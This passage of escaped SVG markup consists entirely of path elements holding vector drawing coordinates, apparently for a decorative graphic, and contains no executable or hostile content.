d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path 